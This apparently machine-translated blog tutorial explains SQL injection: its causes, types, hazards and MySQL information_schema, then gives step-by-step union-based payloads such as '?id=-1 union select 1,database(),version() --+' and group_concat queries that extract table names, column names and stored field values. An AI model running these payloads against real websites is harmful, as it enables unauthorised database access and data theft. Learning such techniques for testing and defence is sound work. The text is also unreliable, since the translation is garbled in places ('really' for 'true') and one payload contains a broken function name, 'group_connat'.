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SQL injection

2022-07-06 14:07:00 Unknown white hat

SQL Inject

SQL Injection is a way to modify the background by operating input SQL Statement to attack code execution

SQL Injection generation principle

  1. The parameters entered by the user are not strictly filtered ( Such as filtering single and double quotation marks Angle brackets, etc ), It is taken to the database to execute . It's caused SQL Inject
  2. It uses string splicing to construct SQL sentence

SQL Classification of Injection

  1. From the classification of injection techniques, it can be divided into : Joint injection query , Error reporting injection , Boolean Injection , Delay Injection , Stack Injection
  2. Injection types can be divided into : Character ( That is, the input is filtered with symbols ), Numerical type ( That is, the input is not filtered with symbols )
  3. From the injection position, it can be divided into :GET data ( The data submission method is GET, Most of them exist in the address bar ),POST( The data submission method is POST, Most of them exist in the input box ),HTTP Head ( The data submission method is HTTP Head ),cookie data ( Submitted by cookie)

SQL Hazards of Injection

There are two kinds of : Endanger the data in the database , Directly endanger the authority of the website ( Need to meet the conditions )

  1. Database information disclosure
  2. Webpage tampering : Log in to the background and publish malicious content
  3. Website hanging horse : When you get it webshell Or after obtaining the permission of the server , Some web Trojans can be hung on the server , To attack others
  4. Add system account without permission
  5. Read and write files to get webshell

MYSQL database

database A= Website A= Database users A

Table name



database B= Website B= Database users B


database C= Website C= Database users C


Necessary knowledge

  1. stay MYSQL5.0 In the previous version ,MYSQL There is a built-in database named information_schema, It is a database name that stores all records , Table name , Database of column names , It is also equivalent to querying it to obtain the table name or column name information under the specified database .
  2. Symbols in the database “.” Represents the next level , Such as xiaodi.user Express xiaodi Database based user Table name .
  3. Common parameters

Information_schema.tables: A table that records all table name information

Information_schema.columns: A table that records all column name information

Table_name: Table name

Column_name: Name

Table_schema: Database name

User() View the current MYSQL Login user name

Database() View current usage MYSQL Database name

Version() View the current MYSQL edition

How to judge the injection point

  1. If the page MYSQL Report errors , Prove that there is SQL Inject holes

Single quotation marks ’

And 1=1

And 1=2

Select * from users where id=1 and 1=1 limit 0,1 normal

Select * from users where id=1 and 1=2 limit 0,2 error

  1. Logical operators ( Or and not )

True and true  = really

True and false = false

True or false = really

Select * from users where id=1 really

1=1 really

1=2 false

True and true = really

True and false = false

Select * from users where id=1 or 1=1 limit 0,1 normal

Select * from users where id=1 or 1=2 limit 0,1 normal

SQL Injection utilization

1. According to the injection location data type, the sql Injection classification

2. utilize order Determine the number of fields

Order by x( Numbers ) The normal value of right and wrong The correct web page displays normally , Error page error

?id=1’ order by 3 --+

3. utilize union select The joint query , take id The setting is not true , The number of available fields can be detected

?id=-1 union select 1,2,3 --+

4. Utilization function database(),user(),version() You can get the database name of the detected database , User name and version number

?id=-1 union select 1,database(),version() --+

5. utilize union select The joint query , Get table name

?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’ Known library name ’ --+

6. utilize union select The joint query , Get field name

?id=-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’ Known table name ’ --+

7. utilize union select The joint query , Get field value

?id=-1’ union select 1,2,group_connat( Known field name ,’:’, Known field name ) from  Known table name --+


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